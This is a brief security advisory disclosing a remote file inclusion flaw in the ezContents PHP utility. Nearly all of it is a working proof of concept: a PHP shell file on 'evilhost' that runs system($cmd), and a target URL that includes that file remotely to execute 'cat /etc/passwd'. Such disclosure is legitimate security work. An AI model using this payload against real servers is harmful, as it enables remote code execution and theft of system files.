The ezContents utility allows for arbitrary code execution on the server due to a lack of input validation.
36c30b0d861ec350e51582820117757d408e10079516d49c48514b47eb2d06fe
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org